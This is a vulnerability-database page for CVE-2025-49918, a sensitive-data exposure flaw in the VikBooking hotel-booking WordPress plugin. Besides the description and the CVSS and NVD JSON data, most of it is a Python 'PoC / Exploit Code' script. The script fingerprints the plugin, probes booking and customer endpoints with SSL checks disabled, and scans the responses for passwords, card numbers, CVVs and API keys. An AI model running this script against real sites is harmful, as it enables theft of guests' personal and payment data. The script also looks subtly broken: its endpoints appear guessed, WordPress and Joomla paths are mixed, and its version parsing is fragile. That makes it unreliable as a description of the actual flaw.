Security Vulnerability Report
中文
CVE-2025-49918 CVSS 5.9 MEDIUM

CVE-2025-49918

Published: 2025-12-18 08:15:52
Last Modified: 2026-04-27 20:16:17
Source: [email protected]

Description

Insertion of Sensitive Information Into Sent Data vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows Retrieve Embedded Sensitive Data.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.2.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

VikBooking Hotel Booking Engine & PMS <= 1.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49918 PoC - VikBooking Sensitive Information Disclosure # Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-49918 # Affected: VikBooking Hotel Booking Engine & PMS <= 1.8.2 import requests import sys import re def check_vikbooking_version(target_url): """Check if VikBooking plugin is installed and get version""" print(f"[*] Checking target: {target_url}") # Common paths for VikBooking plugin paths = [ '/wp-content/plugins/vikbooking/readme.txt', '/wp-content/plugins/vikbooking/vikbooking.php', '/wp-json/wp/v2/plugins?search=vikbooking' ] for path in paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] VikBooking detected at: {url}") # Extract version if available version_match = re.search(r'Text Domain:\s*vikbooking.*?Version:\s*([\d.]+)', response.text, re.DOTALL) if version_match: version = version_match.group(1) print(f"[+] Detected version: {version}") # Check if vulnerable version_parts = [int(x) for x in version.split('.')] if version_parts[0] < 1 or (version_parts[0] == 1 and version_parts[1] < 8) or \ (version_parts[0] == 1 and version_parts[1] == 8 and version_parts[2] <= 2): print(f"[!] Version {version} is VULNERABLE ( <= 1.8.2 )") return version except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") return None def test_sensitive_data_exposure(target_url, proxies=None): """Test for sensitive information disclosure vulnerability""" print("\n[*] Testing for sensitive data exposure...") # Common VikBooking endpoints that might leak data endpoints = [ '/wp-admin/admin-ajax.php?action=vikbooking&task=get_booking_details', '/wp-admin/admin-ajax.php?action=vikbooking&task=get_customer_info', '/index.php?option=com_vikbooking&task=booking_details', '/components/com_vikbooking/views/booking/tmpl/default.xml' ] vulnerable = False sensitive_patterns = [ r'password', r'credit_card', r'cvv', r'social_security', r'email.*@.*\.(com|org|net)', r'phone.*\d{10,}', r'address.*\d{5,}', r'api_key', r'secret' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, proxies=proxies, verify=False) # Check for sensitive data in response for pattern in sensitive_patterns: if re.search(pattern, response.text, re.IGNORECASE): print(f"[!] Potential sensitive data found at: {endpoint}") print(f" Pattern matched: {pattern}") vulnerable = True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") if vulnerable: print("\n[!] VULNERABLE: Sensitive information disclosure detected") else: print("\n[*] No obvious sensitive data exposure detected") print("[*] Manual testing recommended for full verification") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-49918_poc.py <target_url>") print("Example: python cve-2025-49918_poc.py http://example.com") sys.exit(1) target = sys.argv[1] # Suppress SSL warnings (for testing purposes) import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) version = check_vikbooking_version(target) if version: test_sensitive_data_exposure(target) else: print("[-] VikBooking plugin not detected or not accessible") print("\n[*] Scan complete") print("[*] Note: This is a basic check. Full vulnerability assessment requires manual testing.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49918", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:52.083", "lastModified": "2026-04-27T20:16:17.043", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS vikbooking allows Retrieve Embedded Sensitive Data.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through <= 1.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/vikbooking/vulnerability/wordpress-vikbooking-hotel-booking-engine-pms-plugin-1-8-2-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.